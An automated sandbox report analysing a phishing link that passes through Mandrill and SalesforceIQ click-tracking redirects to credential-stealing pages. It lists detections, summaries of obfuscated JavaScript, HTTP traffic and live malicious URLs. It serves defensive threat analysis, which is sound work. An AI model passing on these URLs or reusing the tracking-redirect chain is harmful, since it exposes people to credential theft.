Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://mandrillapp.com/track/click/30363981/app.salesforceiq.com?p=eyJzIjoiQ21jNldfVTIxTkdJZi1NQzQ1SGE3SXJFTW1RIiwidiI6MSwicCI6IntcInVcIjozMDM2Mzk4MSxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL2FwcC5zYWxlc2ZvcmNlaXEuY29tXFxcL3I_dD1BRndoWmYwNjV0QlFRSnRiMVFmd1A1dC0tMHZnQkowaF9lYklFcTVLRlhTWHFVWmFpNUo4

Overview

General Information

Sample URL:https://mandrillapp.com/track/click/30363981/app.salesforceiq.com?p=eyJzIjoiQ21jNldfVTIxTkdJZi1NQzQ1SGE3SXJFTW1RIiwidiI6MSwicCI6IntcInVcIjozMDM2Mzk4MSxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL2FwcC5z
Analysis ID:1579920
Infos:

Detection

Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
AI detected landing page (webpage, office document or email)
AI detected suspicious Javascript
Detected suspicious crossdomain redirect
HTML page contains hidden javascript code
Stores files to the Windows start menu directory

Classification

  • System is w10x64
  • chrome.exe (PID: 3640 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 4372 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2324 --field-trial-handle=2232,i,8424609447750284658,8407064920144454549,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 1536 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://mandrillapp.com/track/click/30363981/app.salesforceiq.com?p=eyJzIjoiQ21jNldfVTIxTkdJZi1NQzQ1SGE3SXJFTW1RIiwidiI6MSwicCI6IntcInVcIjozMDM2Mzk4MSxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL2FwcC5zYWxlc2ZvcmNlaXEuY29tXFxcL3I_dD1BRndoWmYwNjV0QlFRSnRiMVFmd1A1dC0tMHZnQkowaF9lYklFcTVLRlhTWHFVWmFpNUo4RlFTd1dycTkzR1FPbEFuczlLREd2VzRJQ2Z2eGo4WjVDSkQxUTlXdDVvME5XNWMwY0tIaXpVQWJ1YnBhT2dtS2pjVkxkaDFZWE8ybklsdFRlb2VQZ2dVTCZ0YXJnZXQ9NjMxZjQyMGVlZDEzY2EzYmNmNzdjMzI0JnVybD1odHRwczpcXFwvXFxcL21haW4uZDNxczBuMG9xdjNnN28uYW1wbGlmeWFwcC5jb21cIixcImlkXCI6XCI5ZTdkODJiNWQ0NzA0YWVhYTQ1ZjkxY2Y0ZTFmNGRiMFwiLFwidXJsX2lkc1wiOltcImY5ODQ5NWVhMjMyYTgzNjg1ODUxN2Y4ZTRiOTVjZjg4MWZlODExNmJcIl19In0" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://mandrillapp.com/track/click/30363981/app.salesforceiq.com?p=eyJzIjoiQ21jNldfVTIxTkdJZi1NQzQ1SGE3SXJFTW1RIiwidiI6MSwicCI6IntcInVcIjozMDM2Mzk4MSxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL2FwcC5zYWxlc2ZvcmNlaXEuY29tXFxcL3I_dD1BRndoWmYwNjV0QlFRSnRiMVFmd1A1dC0tMHZnQkowaF9lYklFcTVLRlhTWHFVWmFpNUo4RlFTd1dycTkzR1FPbEFuczlLREd2VzRJQ2Z2eGo4WjVDSkQxUTlXdDVvME5XNWMwY0tIaXpVQWJ1YnBhT2dtS2pjVkxkaDFZWE8ybklsdFRlb2VQZ2dVTCZ0YXJnZXQ9NjMxZjQyMGVlZDEzY2EzYmNmNzdjMzI0JnVybD1odHRwczpcXFwvXFxcL21haW4uZDNxczBuMG9xdjNnN28uYW1wbGlmeWFwcC5jb21cIixcImlkXCI6XCI5ZTdkODJiNWQ0NzA0YWVhYTQ1ZjkxY2Y0ZTFmNGRiMFwiLFwidXJsX2lkc1wiOltcImY5ODQ5NWVhMjMyYTgzNjg1ODUxN2Y4ZTRiOTVjZjg4MWZlODExNmJcIl19In0SlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering
Source: https://main.d3qs0n0oqv3g7o.amplifyapp.com/Avira URL Cloud: Label: malware
Source: https://6p205g.ar.yourtaskforce.com/favicon.icoAvira URL Cloud: Label: phishing
Source: https://6p205g.ar.yourtaskforce.com/?_js=_1Avira URL Cloud: Label: phishing
Source: https://6p205g.ar.yourtaskforce.com/?_jd=botdAvira URL Cloud: Label: phishing

Phishing

barindex
Source: https://5mzcue1v.doc.checkiteasy.com/Joe Sandbox AI: Page contains button: 'Slide to verify' Source: '2.2.pages.csv'
Source: https://5mzcue1v.doc.checkiteasy.com/Joe Sandbox AI: Page contains button: 'Slide to verify' Source: '2.3.pages.csv'
Source: 1.1..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://6p205g.ar.yourtaskforce.com/?_js=_1... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to potentially malicious domains. The use of obfuscated URLs and the script's ability to manipulate the DOM and submit forms on behalf of the user raise significant security concerns. While the script's purpose is not entirely clear, the combination of these risky behaviors suggests a high likelihood of malicious intent.
Source: 0.3.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://5mzcue1v.doc.checkiteasy.com/... The provided JavaScript snippet exhibits several high-risk behaviors, including dynamic code execution and potential data exfiltration. The use of the `atob` function to decode a heavily obfuscated string, which is then decrypted using a hardcoded key and written to the document, is a strong indicator of malicious intent. This type of behavior is commonly associated with malware or other types of malicious scripts.
Source: 2.4..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://5mzcue1v.doc.checkiteasy.com/script.js... The provided JavaScript snippet exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirection to a suspicious domain. The heavily obfuscated code further raises concerns about its true intent. While the script may have a legitimate purpose, the combination of these factors suggests a high likelihood of malicious activity, warranting a high-risk score.
Source: https://5mzcue1v.doc.checkiteasy.com/HTTP Parser: Base64 decoded: OD'=& 25<SJaYRDQP[~W]xETKEEEOG!?#TKG]xETKEEENGGCXADF^E_NTMBGJaEYSE_G:R(YVJaEYSE_E^PVK^PIJLWK[JDNJU...
Source: https://5mzcue1v.doc.checkiteasy.com/HTTP Parser: No favicon
Source: https://5mzcue1v.doc.checkiteasy.com/HTTP Parser: No favicon
Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: mandrillapp.com to https://app.salesforceiq.com/r?t=afwhzf065tbqqjtb1qfwp5t--0vgbj0h_ebieq5kfxsxquzai5j8fqswwrq93gqolans9kdgvw4icfvxj8z5cjd1q9wt5o0nw5c0ckhizuabubpaogmkjcvldh1yxo2niltteoepggul&target=631f420eed13ca3bcf77c324&url=https://main.d3qs0n0oqv3g7o.amplifyapp.com
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /track/click/30363981/app.salesforceiq.com?p=eyJzIjoiQ21jNldfVTIxTkdJZi1NQzQ1SGE3SXJFTW1RIiwidiI6MSwicCI6IntcInVcIjozMDM2Mzk4MSxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL2FwcC5zYWxlc2ZvcmNlaXEuY29tXFxcL3I_dD1BRndoWmYwNjV0QlFRSnRiMVFmd1A1dC0tMHZnQkowaF9lYklFcTVLRlhTWHFVWmFpNUo4RlFTd1dycTkzR1FPbEFuczlLREd2VzRJQ2Z2eGo4WjVDSkQxUTlXdDVvME5XNWMwY0tIaXpVQWJ1YnBhT2dtS2pjVkxkaDFZWE8ybklsdFRlb2VQZ2dVTCZ0YXJnZXQ9NjMxZjQyMGVlZDEzY2EzYmNmNzdjMzI0JnVybD1odHRwczpcXFwvXFxcL21haW4uZDNxczBuMG9xdjNnN28uYW1wbGlmeWFwcC5jb21cIixcImlkXCI6XCI5ZTdkODJiNWQ0NzA0YWVhYTQ1ZjkxY2Y0ZTFmNGRiMFwiLFwidXJsX2lkc1wiOltcImY5ODQ5NWVhMjMyYTgzNjg1ODUxN2Y4ZTRiOTVjZjg4MWZlODExNmJcIl19In0 HTTP/1.1Host: mandrillapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /r?t=AFwhZf065tBQQJtb1QfwP5t--0vgBJ0h_ebIEq5KFXSXqUZai5J8FQSwWrq93GQOlAns9KDGvW4ICfvxj8Z5CJD1Q9Wt5o0NW5c0cKHizUAbubpaOgmKjcVLdh1YXO2nIltTeoePggUL&target=631f420eed13ca3bcf77c324&url=https://main.d3qs0n0oqv3g7o.amplifyapp.com HTTP/1.1Host: app.salesforceiq.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: main.d3qs0n0oqv3g7o.amplifyapp.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 6p205g.ar.yourtaskforce.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://main.d3qs0n0oqv3g7o.amplifyapp.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /?_js=_1 HTTP/1.1Host: 6p205g.ar.yourtaskforce.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://6p205g.ar.yourtaskforce.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /?_jd=botd HTTP/1.1Host: 6p205g.ar.yourtaskforce.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://6p205g.ar.yourtaskforce.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://6p205g.ar.yourtaskforce.com/?_js=_1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: 6p205g.ar.yourtaskforce.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://6p205g.ar.yourtaskforce.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /?_js=_1 HTTP/1.1Host: 6p205g.ar.yourtaskforce.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: 6p205g.ar.yourtaskforce.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /?_jd=botd HTTP/1.1Host: 6p205g.ar.yourtaskforce.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/font-awesome/6.0.0/css/all.min.css HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://5mzcue1v.doc.checkiteasy.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /style.css HTTP/1.1Host: 5mzcue1v.doc.checkiteasy.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://5mzcue1v.doc.checkiteasy.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /script.js HTTP/1.1Host: 5mzcue1v.doc.checkiteasy.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://5mzcue1v.doc.checkiteasy.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tracker.php HTTP/1.1Host: 5mzcue1v.doc.checkiteasy.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://5mzcue1v.doc.checkiteasy.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /image/logo.png HTTP/1.1Host: 5mzcue1v.doc.checkiteasy.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://5mzcue1v.doc.checkiteasy.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/font-awesome/6.0.0/webfonts/fa-solid-900.woff2 HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://5mzcue1v.doc.checkiteasy.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://5mzcue1v.doc.checkiteasy.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://5mzcue1v.doc.checkiteasy.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /image/logo.png HTTP/1.1Host: 5mzcue1v.doc.checkiteasy.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /script.js HTTP/1.1Host: 5mzcue1v.doc.checkiteasy.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tracker.php HTTP/1.1Host: 5mzcue1v.doc.checkiteasy.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /undefined?size=400 HTTP/1.1Host: logo.clearbit.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://5mzcue1v.doc.checkiteasy.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://5mzcue1v.doc.checkiteasy.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: ipapi.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://5mzcue1v.doc.checkiteasy.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://5mzcue1v.doc.checkiteasy.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: 5mzcue1v.doc.checkiteasy.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://5mzcue1v.doc.checkiteasy.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: ipapi.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: 5mzcue1v.doc.checkiteasy.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: mandrillapp.com
Source: global trafficDNS traffic detected: DNS query: app.salesforceiq.com
Source: global trafficDNS traffic detected: DNS query: main.d3qs0n0oqv3g7o.amplifyapp.com
Source: global trafficDNS traffic detected: DNS query: 6p205g.ar.yourtaskforce.com
Source: global trafficDNS traffic detected: DNS query: 5mzcue1v.doc.checkiteasy.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: api.ipify.org
Source: global trafficDNS traffic detected: DNS query: logo.clearbit.com
Source: global trafficDNS traffic detected: DNS query: ipapi.co
Source: unknownHTTP traffic detected: POST / HTTP/1.1Host: 6p205g.ar.yourtaskforce.comConnection: keep-aliveContent-Length: 6Cache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1Origin: https://6p205g.ar.yourtaskforce.comContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://6p205g.ar.yourtaskforce.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
